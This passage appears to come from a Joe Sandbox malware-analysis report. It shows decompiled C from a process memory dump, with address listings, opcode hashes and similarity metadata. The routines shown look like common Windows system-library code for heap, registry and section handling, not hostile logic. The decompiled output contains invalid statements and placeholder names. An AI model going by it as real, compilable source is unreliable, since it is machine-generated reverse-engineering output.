						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E016AD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01682280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01684620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E016AF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0167FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x175b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E016AB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                    0x01695142
                    0x0169514c
                    0x01695150
                    0x01695157
                    0x01695159
                    0x0169515e
                    0x01695165
                    0x01695169
                    0x0169516c
                    0x01695172
                    0x01695176
                    0x0169517a
                    0x0169517a
                    0x0169517a
                    0x0169517f
                    0x016d6d8b
                    0x016d6d8e
                    0x016d6d91
                    0x016d6d95
                    0x016d6d98
                    0x016d6d9c
                    0x016d6da0
                    0x016d6da3
                    0x016d6da7
                    0x016d6e26
                    0x016d6e26
                    0x016d6e2a
                    0x016951f9
                    0x016951f9
                    0x016951fe
                    0x016d6e33
                    0x016d6e33
                    0x016d6e39
                    0x016d6e3d
                    0x016d6e46
                    0x016d6e50
                    0x00000000
                    0x00000000
                    0x016d6e52
                    0x016d6e53
                    0x016d6e56
                    0x016d6e5d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016d6e5f
                    0x016d6e67
                    0x016d6e77
                    0x016d6e7f
                    0x016d6e80
                    0x016d6e88
                    0x016d6e90
                    0x016d6e9f
                    0x016d6ea5
                    0x016d6ea9
                    0x016d6eb1
                    0x016d6ebf
                    0x00000000
                    0x00000000
                    0x016d6ecf
                    0x016d6ed3
                    0x00000000
                    0x00000000
                    0x016d6edb
                    0x016d6ede
                    0x016d6ee1
                    0x016d6ee8
                    0x016d6eeb
                    0x016d6eed
                    0x016d6ef0
                    0x016d6ef4
                    0x016d6ef8
                    0x016d6efc
                    0x00000000
                    0x00000000
                    0x016d6f0d
                    0x016d6f11
                    0x016d6f32
                    0x016d6f37
                    0x016d6f3b
                    0x016d6f3e
                    0x016d6f41
                    0x016d6f46
                    0x00000000
                    0x00000000
                    0x016d6f4c
                    0x016d6f50
                    0x016d6f50
                    0x016d6f54
                    0x016d6f62
                    0x016d6f65
                    0x016d6f6d
                    0x016d6f7b
                    0x016d6f7b
                    0x016d6f93
                    0x016d6f98
                    0x016d6fa0
                    0x016d6fa6
                    0x016d6fb3
                    0x016d6fb6
                    0x016d6fbf
                    0x016d6fc1
                    0x016d6fd5
                    0x016d6fda
                    0x016d6fda
                    0x016d6fdd
                    0x016d6fe2
                    0x016d6fe7
                    0x016d6feb
                    0x016d6fef
                    0x016d6ff3
                    0x0169520c
                    0x0169520c
                    0x0169520f
                    0x01695215
                    0x01695234
                    0x0169523a
                    0x0169523a
                    0x01695244
                    0x01695245
                    0x01695246
                    0x01695251
                    0x01695251
                    0x016d6f13
                    0x016d6f17
                    0x016d6f17
                    0x016d6f18
                    0x016d6f1b
                    0x016d6f1f
                    0x016d6f23
                    0x00000000
                    0x016d6f28
                    0x01695204
                    0x01695204
                    0x01695208
                    0x00000000
                    0x01695208
                    0x01695185
                    0x01695188
                    0x0169518a
                    0x0169518e
                    0x01695195
                    0x016d6db1
                    0x016d6db5
                    0x016d6db9
                    0x0169519b
                    0x0169519b
                    0x0169519e
                    0x016951a7
                    0x016951a9
                    0x016951a9
                    0x016951b5
                    0x016951b8
                    0x016951bb
                    0x016951be
                    0x016951c1
                    0x016951c5
                    0x016951c9
                    0x016951cd
                    0x016951cd
                    0x016951d8
                    0x016951dc
                    0x016951e0
                    0x016d6dcc
                    0x016d6dd0
                    0x016d6dd5
                    0x016d6ddd
                    0x016d6de1
                    0x016d6de1
                    0x016d6de5
                    0x016d6deb
                    0x016d6df1
                    0x016d6df7
                    0x016d6dfd
                    0x016d6e01
                    0x016d6e05
                    0x016d6e09
                    0x016d6e0d
                    0x016d6e11
                    0x016d6e11
                    0x016951eb
                    0x016d6e1a
                    0x016d6e1f
                    0x016d6e21
                    0x016d6e23
                    0x00000000
                    0x016951f1
                    0x016951f1
                    0x00000000
                    0x016951f1

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cf032abfd626239e48b6228f588d89c945d8fb44d0852c6a3ede85e2e887b5f3
                    • Instruction ID: 54e58c8cf7e4fdc5dbcb0635a4c700f2c4acbcb8fdfde94b8ce20572bad9c821
                    • Opcode Fuzzy Hash: cf032abfd626239e48b6228f588d89c945d8fb44d0852c6a3ede85e2e887b5f3
                    • Instruction Fuzzy Hash: BEC123755083818FD755CF28C980A6AFBF1BF88304F148AAEF9998B352D771E945CB42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016903E2 Relevance: .3, Instructions: 254COMMON
                    Download Yara Rule
                    C-Code - Quality: 74%
                    			E016903E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x175d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01690548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E016AB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0167B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1757c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01687D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01687D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E016E7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E016A9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E016E69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1757c04 != 0) {
						_t118 = _v12;
						_t120 = E016EA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1757bd8;
						if( *0x1757bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E016A95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E016A99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E016E3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0166B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E016AAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1758474 - 3;
										if( *0x1758474 != 3) {
											 *0x17579dc =  *0x17579dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01687D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01687D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E016E7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1758708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1757b00; // 0x0
							asm("ror esi, cl");
							 *0x175b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E016A95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E01677F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                    0x016903f1
                    0x016903f7
                    0x016903f9
                    0x016903fb
                    0x016903fd
                    0x01690400
                    0x0169040a
                    0x016d4c7a
                    0x01690537
                    0x01690547
                    0x01690410
                    0x01690410
                    0x01690414
                    0x01690417
                    0x0169041a
                    0x01690421
                    0x01690424
                    0x0169042b
                    0x0169043b
                    0x0169043e
                    0x0169043f
                    0x0169043f
                    0x01690446
                    0x01690449
                    0x0169044c
                    0x0169044f
                    0x01690459
                    0x016d4c8d
                    0x0169045f
                    0x0169045f
                    0x0169045f
                    0x01690467
                    0x016d4c97
                    0x016d4c9d
                    0x016d4ca4
                    0x016d4caa
                    0x016d4caf
                    0x016d4cb1
                    0x016d4cc3
                    0x016d4cb3
                    0x016d4cbc
                    0x016d4cbc
                    0x016d4cc8
                    0x016d4ccb
                    0x016d4cd7
                    0x016d4cda
                    0x016d4cdf
                    0x016d4cdf
                    0x016d4ccb
                    0x016d4ca4
                    0x0169046d
                    0x0169046f
                    0x0169046f
                    0x01690471
                    0x01690476
                    0x0169047a
                    0x0169047b
                    0x01690483
                    0x01690489
                    0x0169048d
                    0x00000000
                    0x00000000
                    0x016d4ce9
                    0x016d4cef
                    0x016d4d22
                    0x016d4d22
                    0x00000000
                    0x016d4d22
                    0x016d4cf1
                    0x016d4cf7
                    0x00000000
                    0x00000000
                    0x016d4cf9
                    0x016d4cff
                    0x00000000
                    0x00000000
                    0x016d4d05
                    0x016d4d07
                    0x00000000
                    0x00000000
                    0x016d4d0d
                    0x016d4d0f
                    0x016d4d14
                    0x016d4d16
                    0x00000000
                    0x00000000
                    0x016d4d1c
                    0x016d4d1c
                    0x01690499
                    0x01690535
                    0x01690535
                    0x00000000
                    0x01690535
                    0x016904a6
                    0x016d4d2c
                    0x016d4d37
                    0x016d4d39
                    0x016d4d3b
                    0x00000000
                    0x00000000
                    0x016d4d41
                    0x016d4d48
                    0x01690527
                    0x0169052b
                    0x0169052d
                    0x01690530
                    0x01690530
                    0x00000000
                    0x0169052b
                    0x016d4d4e
                    0x016904ac
                    0x016904ac
                    0x016904af
                    0x016904b2
                    0x016904b7
                    0x016904b9
                    0x016904bb
                    0x016904bd
                    0x016904bf
                    0x016904c5
                    0x016904c9
                    0x016d4d53
                    0x016d4d59
                    0x016d4db9
                    0x016d4dba
                    0x016d4dbf
                    0x016d4dc2
                    0x016d4dc4
                    0x016d4dc7
                    0x016d4dce
                    0x00000000
                    0x016d4dce
                    0x016d4d5b
                    0x016d4d61
                    0x00000000
                    0x00000000
                    0x016d4d63
                    0x016d4d69
                    0x00000000
                    0x00000000
                    0x016d4d6b
                    0x016d4d6e
                    0x016d4d74
                    0x016d4d76
                    0x016d4d7c
                    0x016d4d7e
                    0x016d4d84
                    0x016d4d89
                    0x016d4d8c
                    0x016d4d8d
                    0x016d4d92
                    0x016d4d95
                    0x016d4d96
                    0x016d4d98
                    0x016d4d9a
                    0x016d4d9f
                    0x016d4da4
                    0x016d4da6
                    0x016d4da8
                    0x016d4daf
                    0x016d4db1
                    0x016d4db1
                    0x016d4daf
                    0x016d4da6
                    0x016d4d84
                    0x016d4d7c
                    0x00000000
                    0x016d4d74
                    0x016904d6
                    0x016d4de1
                    0x016904dc
                    0x016904dc
                    0x016904dc
                    0x016904e4
                    0x016d4deb
                    0x016d4df1
                    0x016d4df8
                    0x016d4dfe
                    0x016d4e03
                    0x016d4e05
                    0x016d4e17
                    0x016d4e07
                    0x016d4e10
                    0x016d4e10
                    0x016d4e1c
                    0x016d4e1f
                    0x016d4e35
                    0x016d4e35
                    0x016d4e1f
                    0x016d4df8
                    0x016904f1
                    0x016904fa
                    0x016d4e3f
                    0x016d4e47
                    0x016d4e5b
                    0x016d4e61
                    0x016d4e67
                    0x016d4e69
                    0x016d4e71
                    0x016d4e73
                    0x01690500
                    0x01690500
                    0x01690500
                    0x016904fa
                    0x01690508
                    0x0169051d
                    0x0169051d
                    0x0169051f
                    0x01690524
                    0x00000000
                    0x01690524
                    0x01690515
                    0x01690517
                    0x016d4e7a
                    0x016d4e7c
                    0x00000000
                    0x00000000
                    0x016d4e85
                    0x00000000
                    0x016d4e85
                    0x00000000
                    0x01690517

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 291e503c737dc89bdddd7bb51cffbeb153f54247ca13abf9d628aabf404c94df
                    • Instruction ID: c2a78570436b0e29a2b2dd0ed48d1bb7e3916bbf22d8ba4cfa5808e8affe5848
                    • Opcode Fuzzy Hash: 291e503c737dc89bdddd7bb51cffbeb153f54247ca13abf9d628aabf404c94df
                    • Instruction Fuzzy Hash: 5C911432E01215EBEF319B6CCC48BAD7BADAB04B24F150265FA11AB7D1DB749C40CB85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0166C600 Relevance: .2, Instructions: 225COMMON
                    Download Yara Rule
                    C-Code - Quality: 67%
                    			E0166C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x175d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E01676D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E016AB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1757b9c; // 0x0
					_t74 = L01684620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E016A9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L016877F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E016AF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E016A13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L016877F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E016A9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                    0x0166c608
                    0x0166c615
                    0x0166c625
                    0x0166c62d
                    0x0166c635
                    0x0166c640
                    0x0166c680
                    0x0166c687
                    0x0166c688
                    0x0166c689
                    0x0166c694
                    0x0166c694
                    0x0166c642
                    0x0166c64a
                    0x0166c697
                    0x016d7a25
                    0x016d7a2b
                    0x016d7a2e
                    0x016d7a30
                    0x016d7bea
                    0x016d7bea
                    0x00000000
                    0x016d7bea
                    0x016d7a36
                    0x016d7a43
                    0x016d7a48
                    0x016d7a4c
                    0x016d7a4e
                    0x00000000
                    0x00000000
                    0x016d7a58
                    0x016d7a5a
                    0x016d7a5b
                    0x016d7a5c
                    0x016d7a5d
                    0x016d7a63
                    0x016d7a64
                    0x016d7a6a
                    0x016d7a6c
                    0x016d7a6e
                    0x016d79cb
                    0x016d79cb
                    0x016d79ce
                    0x016d79d0
                    0x016d7a98
                    0x016d7a9b
                    0x016d7a9b
                    0x016d7a9e
                    0x016d7aa1
                    0x016d7bbe
                    0x016d7bbe
                    0x016d7bc0
                    0x016d7be0
                    0x016d7be0
                    0x016d7a01
                    0x016d7a01
                    0x016d7a05
                    0x016d7a07
                    0x016d7a15
                    0x016d7a15
                    0x016d7a1a
                    0x00000000
                    0x016d7a1a
                    0x016d7bc2
                    0x016d7bc6
                    0x016d7bc9
                    0x016d7bcd
                    0x016d7bcf
                    0x016d79e6
                    0x016d79e6
                    0x016d79eb
                    0x016d79eb
                    0x016d79ef
                    0x016d79f1
                    0x00000000
                    0x00000000
                    0x016d79f3
                    0x016d79f5
                    0x016d79ff
                    0x016d79ff
                    0x00000000
                    0x016d79ff
                    0x016d79f7
                    0x016d79fd
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016d79fd
                    0x016d7bd5
                    0x016d7bd8
                    0x00000000
                    0x00000000
                    0x016d7ba9
                    0x016d7bac
                    0x016d7bb0
                    0x016d7bb1
                    0x016d7bb1
                    0x016d7bb6
                    0x00000000
                    0x016d7bb6
                    0x016d7aa7
                    0x016d7aaa
                    0x00000000
                    0x00000000
                    0x016d7ab2
                    0x016d7ab3
                    0x016d7ab5
                    0x016d7aec
                    0x016d7aef
                    0x016d7b25
                    0x016d7b28
                    0x016d7b62
                    0x016d7b64
                    0x016d7b8f
                    0x016d7b92
                    0x016d7b96
                    0x016d7b98
                    0x00000000
                    0x00000000
                    0x016d7b9e
                    0x016d7b9f
                    0x016d7ba3
                    0x00000000
                    0x016d7ba3
                    0x016d7b66
                    0x016d7b68
                    0x016d7ae2
                    0x016d7ae2
                    0x00000000
                    0x016d7ae2
                    0x016d7b6e
                    0x016d7b72
                    0x016d7b75
                    0x016d7b81
                    0x016d7b85
                    0x016d7b87
                    0x00000000
                    0x00000000
                    0x016d7b31
                    0x016d7b34
                    0x016d7b3c
                    0x016d7b45
                    0x016d7b46
                    0x016d7b4f
                    0x016d7b51
                    0x016d7b57
                    0x016d7b59
                    0x016d7b59
                    0x00000000
                    0x016d7b59
                    0x016d7b77
                    0x00000000
                    0x016d7b77
                    0x016d7b2a
                    0x00000000
                    0x016d7b2a
                    0x016d7af1
                    0x016d7af3
                    0x00000000
